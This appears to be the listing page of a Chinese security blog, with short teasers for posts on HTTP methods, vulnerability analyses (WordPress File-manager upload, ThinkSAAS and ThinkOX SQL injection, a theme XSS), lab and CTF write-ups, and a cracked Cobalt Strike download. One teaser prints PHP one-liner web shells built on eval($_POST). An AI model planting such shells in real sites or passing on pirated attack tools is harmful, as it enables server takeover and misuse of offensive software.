安全闲碎 不安全的HTTP方法 我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法。WebDAV (Web-based Distributed Authorin... 01月14日 33 views 发表评论 阅读全文
安全工具 多款工具分享干货 | Cobalt Strike4.2Win+Mac破解版 CS4.2优化内容 1. Cobalt Strike 4.2重新审视了Cobalt Strike的屏幕截图和击键记录工具。这两个功能现在都从其运行的上下文中报告当前用户,桌面会话和活动窗... 12月29日 87 views 发表评论 阅读全文
安全文章 小白入门靶机-Pikachu之暴力破解 00—前言靶机项目地址:https://github.com/zhuifengshaonianhanlu/pikachu环境准备:Phpstudy关于上面环境安装搭建的教程网上太多啦,大家第一次接触的... 12月25日 50 views 发表评论 阅读全文
安全文章 实战挖掘公益src(绕过waf) 本期文章内容不复杂,有不懂的地方可以留言学习或者进群学习 这个国庆是要挖洞还是去撩妹呢?本屌想了一下午,挖洞,ok那么下面我们准备找目标开始信息收集一波目录域名Whiosc段接... 10月05日 103 views 发表评论 阅读全文
安全文章 HW平安夜: 09/16 风平浪静 没人比我更了解攻击队,他们肯定已经写好投降书了。我想给大家说个消息:“现在攻击方的分数都不低了”当你还在创作防守日记突然身后站着一位攻击队选手正在认真的记着桌面上的VPN登录密码....1、Think... 09月17日 232 views 发表评论 阅读全文
安全文章 WordPress File-manager 任意文件上传漏洞分析 漏洞分析分析环境:wordpress 5.5.1file manager 6.0win10 phpstudy php 7.0.9漏洞点位于file manager的connector.minimal.... 09月15日 109 views 发表评论 阅读全文
逆向工程 “中能融合杯”全国第六届工控系统信息安全攻防竞赛Wp 比赛时间:2020-09-12 09:00:00- 17:00:00签到题本题考查西门子S7协议,发送题目给出的报文0300002402f080320100000009000e00050... 09月14日 294 views 发表评论 阅读全文
安全文章 一些常用的一句话分享 php-基本 <?php eval($_POST) ?><?php @eval($_POST);?>php变形记 <?php $a = str_replace(x,"",... 09月04日 115 views 发表评论 阅读全文
漏洞时代 ThinkSAAS SQL注入 版本 ThinkSAAS 2.32 目前最新版。 app/group/action/do.php 281行post变量全局做了转义,$content = tsClean($_POS... 01月01日 407 views 发表评论 阅读全文
漏洞时代 ThinkOX 最新版 SQL 注入(盲注) /Application/Group/Controller/GroupController.class.php这两处都是直接拼接的,导致调用这两处函数的地方存在注入。因为返回的只是... 01月01日 389 views 发表评论 阅读全文
漏洞时代 wordpress主题dmeng存在XSS跨站 由于某编辑辛苦弄了一套主题。然后被某墨盒测试出来一个XSS漏洞。然后就丢给我。让我看看这个漏洞能不能修复。 首先找到问题所在,是在发送私信的地方存在对参数每一过滤好造成的。读取的时... 01月01日 316 views 发表评论 阅读全文